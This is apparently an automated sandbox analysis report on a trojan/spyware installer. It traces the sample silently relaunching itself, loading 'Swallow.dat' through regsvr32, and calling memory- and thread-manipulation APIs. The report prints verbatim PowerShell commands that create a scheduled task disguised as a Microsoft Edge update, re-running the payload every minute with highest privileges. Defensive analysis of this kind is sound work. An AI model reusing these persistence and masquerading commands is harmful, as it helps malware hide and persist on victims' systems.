Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005510000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/#
Source: regsvr32.exe, 00000009.00000003.101952377109.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/.
Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/C
Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/Y
Source: powershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101908630743.0000025DB9CC6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.101779809519.000002A4CEA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA16DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzA
Source: powershell.exe, 0000000C.00000002.101837470212.0000025DA2853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 0000000A.00000002.101798259193.000002A4DE8C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.101779809519.000002A4CFD3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101896209492.0000025DB1525000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA29A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101994038719.000001E26D311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25E72F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000A.00000002.101802236942.000002A4E6A5F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101905223523.0000025DB99C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.102005654098.000001E2753EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 0000000C.00000002.101837470212.0000025DA256D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005510000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/
Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/g
Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005510000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/
Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/)
Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/m
Source: regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/
Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/.
Source: regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/E
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990119D0 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,RtlFreeHeap,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,GetProcessTimes,14_2_00007FFB990119D0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB99014570 NtQuerySystemInformation,memcpy,RtlFreeHeap,RtlFreeHeap,14_2_00007FFB99014570
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FF87B0 memset,GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose,14_2_00007FFB98FF87B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFB5B98306112_2_00007FFB5B983061
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990119D014_2_00007FFB990119D0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9909BA7014_2_00007FFB9909BA70
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9901F8A014_2_00007FFB9901F8A0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FF1CC014_2_00007FFB98FF1CC0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FF414014_2_00007FFB98FF4140
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9909D3C014_2_00007FFB9909D3C0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FFD2B014_2_00007FFB98FFD2B0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990EE9B014_2_00007FFB990EE9B0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990849F014_2_00007FFB990849F0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FFBA6014_2_00007FFB98FFBA60
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9907CA6014_2_00007FFB9907CA60
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9900E93014_2_00007FFB9900E930
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9901096014_2_00007FFB99010960
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB99018BC014_2_00007FFB99018BC0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB99072BE014_2_00007FFB99072BE0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB99017BE014_2_00007FFB99017BE0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FF7C2014_2_00007FFB98FF7C20
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990D5C5014_2_00007FFB990D5C50
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9901BAC014_2_00007FFB9901BAC0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9900FB5014_2_00007FFB9900FB50
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990A5DA014_2_00007FFB990A5DA0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990A2E1014_2_00007FFB990A2E10
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB99014E0014_2_00007FFB99014E00
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB99046E2014_2_00007FFB99046E20
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB99005CA014_2_00007FFB99005CA0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FFDD1014_2_00007FFB98FFDD10
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990DFD4014_2_00007FFB990DFD40
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990E8D6014_2_00007FFB990E8D60
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9900EFF014_2_00007FFB9900EFF0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990EEFF014_2_00007FFB990EEFF0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9901804014_2_00007FFB99018040
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB99018EA014_2_00007FFB99018EA0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB99005CA014_2_00007FFB99005CA0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FFDD1014_2_00007FFB98FFDD10
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990691C014_2_00007FFB990691C0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990951C014_2_00007FFB990951C0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990CB1F014_2_00007FFB990CB1F0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9900022014_2_00007FFB99000220
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9901027014_2_00007FFB99010270
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9900329014_2_00007FFB99003290
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990630E014_2_00007FFB990630E0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9900213014_2_00007FFB99002130
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9902217014_2_00007FFB99022170
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FF816014_2_00007FFB98FF8160
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9900247014_2_00007FFB99002470
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990022F014_2_00007FFB990022F0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9909231014_2_00007FFB99092310
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990EB33014_2_00007FFB990EB330
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9900F5A014_2_00007FFB9900F5A0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990CD5A014_2_00007FFB990CD5A0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990025F014_2_00007FFB990025F0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990A257014_2_00007FFB990A2570
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FF87B014_2_00007FFB98FF87B0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9906285014_2_00007FFB99062850
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990866A014_2_00007FFB990866A0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9909973014_2_00007FFB99099730
Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFB990D8D00 appears 63 times
Source: i9DKxTZoVd.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: i9DKxTZoVd.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: i9DKxTZoVd.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: i9DKxTZoVd.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: i9DKxTZoVd.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-8SV5O.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-8SV5O.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-N7DV6.tmp.7.drStatic PE information: Number of sections : 11 > 10
Source: i9DKxTZoVd.exe, 00000000.00000003.101663444971.0000000002612000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs i9DKxTZoVd.exe
Source: i9DKxTZoVd.exe, 00000000.00000003.101663862917.000000007FE3E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs i9DKxTZoVd.exe
Source: i9DKxTZoVd.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/24@1/1
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FFFA70 GetDiskFreeSpaceExW,14_2_00007FFB98FFFA70
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpFile created: C:\Users\user\AppData\Local\unins000.datJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_03
Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\DefaultMutex
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4644:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:304:WilStaging_02
Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\52d4ec474c5e
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4644:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeFile created: C:\Users\user\AppData\Local\Temp\is-O75JM.tmpJump to behavior
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: i9DKxTZoVd.exeReversingLabs: Detection: 39%
Source: i9DKxTZoVd.exeVirustotal: Detection: 22%
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeFile read: C:\Users\user\Desktop\i9DKxTZoVd.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\i9DKxTZoVd.exe "C:\Users\user\Desktop\i9DKxTZoVd.exe"
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeProcess created: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmp "C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmp" /SL5="$1041C,956295,140800,C:\Users\user\Desktop\i9DKxTZoVd.exe"
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\i9DKxTZoVd.exe "C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp "C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp" /SL5="$20468,956295,140800,C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat"
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AF4B0CC-A257-4A7E-E201-D5DF536679FB}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeProcess created: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmp "C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmp" /SL5="$1041C,956295,140800,C:\Users\user\Desktop\i9DKxTZoVd.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\i9DKxTZoVd.exe "C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp "C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp" /SL5="$20468,956295,140800,C:\Users\user\Desktop\i9DKxTZoVd.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat"Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\Swallow.dat"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AF4B0CC-A257-4A7E-E201-D5DF536679FB}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\Swallow.dat' }) { exit 0 } else { exit 1 }"
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\i9DKxTZoVd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmpSection loaded: edgegdi.dllJump to behavior
